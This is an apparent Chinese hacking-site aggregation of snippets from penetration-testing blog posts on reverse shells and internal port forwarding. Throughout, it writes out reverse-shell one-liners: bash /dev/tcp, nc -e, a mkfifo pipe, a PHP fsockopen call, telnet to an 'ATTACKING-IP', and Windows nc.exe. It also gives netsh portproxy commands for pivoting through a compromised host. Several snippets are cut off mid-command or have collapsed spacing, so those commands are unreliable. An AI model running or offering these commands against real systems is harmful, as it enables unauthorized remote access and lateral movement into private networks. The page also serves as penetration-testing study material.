网络技术
Web渗透中的反弹Shell与端口转发的奇淫技巧_黑客技术
0×00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0×01 反弹shell 1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash -i >& /dev/tcp/x.x.x.x/2333 0>&12) NetCatNetcat反弹shell也是常用兵器,经典命令参数-enc -e /bin/sh x.x.x.x 2333但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gWeb渗透中的反弹Shell与端口转发的奇淫技巧_记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华黑客技术
Original link
linux下反弹shell的几种方法 - Radiation's Blog - 博客频道 - CSDN.NET
在反弹的开始,我们需要使用nc在本地或者任意要反弹到的地方监听一个端口。最简单的做法是nc -l -p 8080,8080为要反弹的端口0x01-使用bashbash -i >& /dev/[tcp|udp]/10.1.1.19/8080 0>&1 注:该命令使用的是系统原生bash,[tcp|udp]是要使用的协议,一般选择tcp就行,10.1.1.19是你要反弹到的地址,如果要反弹到你的电脑上
Original link
剑走偏锋:细数Shell那些事 - FreeBuf.COM | 关注黑客与极客
说到Shell,我想大家恐怕都不会太陌生。不仅如此,我想大家应该有不少自己的珍藏吧(有珍藏的可以私信我,咱们私聊:P) 按平台分类的话,基本上大体可以分为两大类:针对web级别的和针对系统级别的。针对web的大体...
Original link
Web渗透中的反弹Shell与端口转发的奇淫技巧_黑客技术
0×00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0×01 反弹shell 1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash -i >& /dev/tcp/x.x.x.x/2333 0>&12) NetCatNetcat反弹shell也是常用兵器,经典命令参数-enc -e /bin/sh x.x.x.x 2333但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gWeb渗透中的反弹Shell与端口转发的奇淫技巧_记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华黑客技术
Original link
多平台-内网反弹转发小结
来源:http://bbs.ichunqiu.com/thread-9492-1-1.html?from=ch 社区:i春秋 时间:2016年8月6号晚 作者:Binghe 前言 当获得单目标权限,若想扩大漏洞影响,我们可以以此为跳板杀入内网,即使你内网内有些机器是不联网的。 简介 大致了解内网中的端口反弹 、映射手法,适合新手学习 目录 0x01:关于交互式shell反弹 0x02:关于内网渗透中的端口映射 0x03:内网中易被忽略的双向隧道 正文 0x01 关于交互式shell反弹 关于反弹交互式command的shell回来在windows上面一般使用nc webshell里执行 [AppleScript] 纯文本查看 复制代码 C:\nc.exe-e C:\recycler\cmd.exe YourIP51 本机执行 [AppleScript] 纯文本查看 复制代码 nc-l-vv-p51 自己需是外网 或者你是内网且在路由作了51的端口映射,最好是在外网的服务器好些 linux上面一般用以下几种脚本 [AppleScript] 纯文本查看 复制代码 BASH bash-i>&/dev/tcp/10.0.0.1/80800>&1 PHP php-r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");' TELNET rm-f/tmp/p; mknod/tmp/p p&&telnet ATTACKING-IP800/tmp/p 0X02 关于内网渗透中的端口映射 适应场景经常遇到 主机只有内部网络可以访问 拿下一台权限后 以此为跳板连接其他主机端口 即把拿到权限的主机当成一台路由器 做个端口映射 windows中利用netsh映射内网端口(一次执行 重启亦在) 举例 拿到192.1681.101的权限, 目标是192.168.1.106的ssh 必须先来在162.168.1.101安装IPV6 [AppleScript] 纯文本查看 复制代码 netsh interface ipv6install 然后 [AppleScript] 纯文本查看 复制代码 netsh interface portproxyaddv4tov4listenaddress=192.1681.101listenport=666connectaddress=192.168.1.106connectport=22 查看存在的转发 [AppleScript] 纯文本查看 复制代码 netsh interface portproxyshowall 现在连接192.168.1.101:666 就相当于链接到目标机的22端口了 删除 [AppleScript] 纯文本查看 复制代码 netsh interface portproxydeletev4tov4listenaddress=192.168.1.101listenport=666 我自己在内网测试连接目标3389测试的效果 那么如果我们拿到的是一台linux呢? 当然有办法啦 写个c脚本就好 我一般用某牛写的这个集成的 功能多一些 ...
Original link